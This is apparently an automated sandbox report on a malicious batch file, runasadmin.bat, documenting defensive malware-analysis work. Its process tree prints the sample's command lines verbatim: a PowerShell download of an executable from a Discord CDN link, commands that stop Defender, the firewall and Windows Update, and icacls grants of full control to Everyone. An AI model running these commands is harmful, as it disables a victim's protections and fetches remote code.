Analysis
max time kernel: 31s
max time network: 34s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-05-2024 17:43
Static task: static1
General
Target: runasadmin.bat
Size: 1KB
MD5: 8c6d25434d4d9d6c230a727a90b3e111
SHA1: bb21e80767f6c2f6fcc382eeb0c67afc7294dae9
SHA256: 61d3ded7796d8e1e237a9d5b29dfa3c85bd8a7b0851158683b7182c8693efc5f
SHA512: a9f81718046624aaf8c391e390dba81250f6c346e9aec4e929ca6a60eaecac5928ec961df91b2c520fa99b50481b8310192d8576cf1e20cb0d4129b8aadc194c
Malware Config
Signatures
Modifies Windows Firewall (2 TTPs, 7 IoCs)
  Processes: netsh.exe (PIDs 5016, 4904, 1712, 2308, 2780, 4268, 1444)
Possible privilege escalation attempt (3 IoCs)
  Processes: icacls.exe (PID 4672), icacls.exe (PID 4652), takeown.exe (PID 2636)
Modifies file permissions (1 TTP, 3 IoCs)
  Processes: takeown.exe (PID 2636), icacls.exe (PID 4672), icacls.exe (PID 4652)
Launches sc.exe (2 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  Processes: sc.exe (PID 4104), sc.exe (PID 4628)
Delays execution with timeout.exe (1 IoC)
  Processes: timeout.exe (PID 4368)
Runs net.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe (PID 1956), powershell.exe (PID 1956)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 1956), Token: SeDebugPrivilege
Suspicious use of WriteProcessMemory (44 IoCs)
  Processes (source PID and process -> target PID and process; the report records each write twice):
    1100 cmd.exe -> 1956 powershell.exe (2 entries)
    1100 cmd.exe -> 4104 sc.exe (2 entries)
    1100 cmd.exe -> 4628 sc.exe (2 entries)
    1100 cmd.exe -> 3504 net.exe (2 entries)
    3504 net.exe -> 4952 net1.exe (2 entries)
    1100 cmd.exe -> 1760 net.exe (2 entries)
    1760 net.exe -> 3980 net1.exe (2 entries)
    1100 cmd.exe -> 2636 takeown.exe (2 entries)
    1100 cmd.exe -> 4672 icacls.exe (2 entries)
    1100 cmd.exe -> 4652 icacls.exe (2 entries)
    1100 cmd.exe -> 3420 net.exe (2 entries)
    3420 net.exe -> 2692 net1.exe (2 entries)
    1100 cmd.exe -> 2732 net.exe (2 entries)
    2732 net.exe -> 2552 net1.exe (2 entries)
    1100 cmd.exe -> 2308 netsh.exe (2 entries)
    1100 cmd.exe -> 2780 netsh.exe (2 entries)
    1100 cmd.exe -> 4268 netsh.exe (2 entries)
    1100 cmd.exe -> 1444 netsh.exe (2 entries)
    1100 cmd.exe -> 5016 netsh.exe (2 entries)
    1100 cmd.exe -> 4904 netsh.exe (2 entries)
    1100 cmd.exe -> 1712 netsh.exe (2 entries)
    1100 cmd.exe -> 4368 timeout.exe (2 entries)
Processes (tree depth shown by indentation)
C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
  Signatures: Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\sc.exe
      Command line: sc config "wuauserv" start= disabled
      Signatures: Launches sc.exe
    C:\Windows\system32\sc.exe
      Command line: sc config "TrustedInstaller" start= disabled
      Signatures: Launches sc.exe
    C:\Windows\system32\net.exe
      Command line: net stop wuauserv
      Signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop wuauserv
    C:\Windows\system32\net.exe
      Command line: net stop TrustedInstaller
      Signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop TrustedInstaller
    C:\Windows\system32\takeown.exe
      Command line: takeown /F C:\X\Y\Z /A /R
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    C:\Windows\system32\icacls.exe
      Command line: icacls C:\X\Y\Z /grant Everyone:F /T
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    C:\Windows\system32\icacls.exe
      Command line: icacls . /grant Everyone:F /T /C /Q
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    C:\Windows\system32\net.exe
      Command line: net stop "Windows Defender Service"
      Signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop "Windows Defender Service"
    C:\Windows\system32\net.exe
      Command line: net stop "Windows Firewall"
      Signatures: Suspicious use of WriteProcessMemory
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop "Windows Firewall"
    C:\Windows\system32\netsh.exe
      Command line: netsh firewall set opmode disable
      Signatures: Modifies Windows Firewall
    C:\Windows\system32\netsh.exe
      Command line: netsh firewall set opmode mode=DISABLE
      Signatures: Modifies Windows Firewall
    C:\Windows\system32\netsh.exe
      Command line: netsh advfirewall set currentprofile state off
      Signatures: Modifies Windows Firewall
    C:\Windows\system32\netsh.exe
      Command line: netsh advfirewall set domainprofile state off
      Signatures: Modifies Windows Firewall
    C:\Windows\system32\netsh.exe
      Command line: netsh advfirewall set privateprofile state off
      Signatures: Modifies Windows Firewall
    C:\Windows\system32\netsh.exe
      Command line: netsh advfirewall set publicprofile state off
      Signatures: Modifies Windows Firewall
    C:\Windows\system32\netsh.exe
      Command line: netsh advfirewall set allprofiles state off
      Signatures: Modifies Windows Firewall
    C:\Windows\system32\timeout.exe
      Command line: timeout /t 1 /nobreak
      Signatures: Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cdywult.iq3.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
memory/1956-0-0x00007FFCAA423000-0x00007FFCAA425000-memory.dmp
  Filesize: 8KB
memory/1956-1-0x000001F8CE6E0000-0x000001F8CE702000-memory.dmp
  Filesize: 136KB
memory/1956-11-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp
  Filesize: 10.8MB
memory/1956-12-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp
  Filesize: 10.8MB
memory/1956-15-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp
  Filesize: 10.8MB
memory/1956-16-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmp
  Filesize: 10.8MB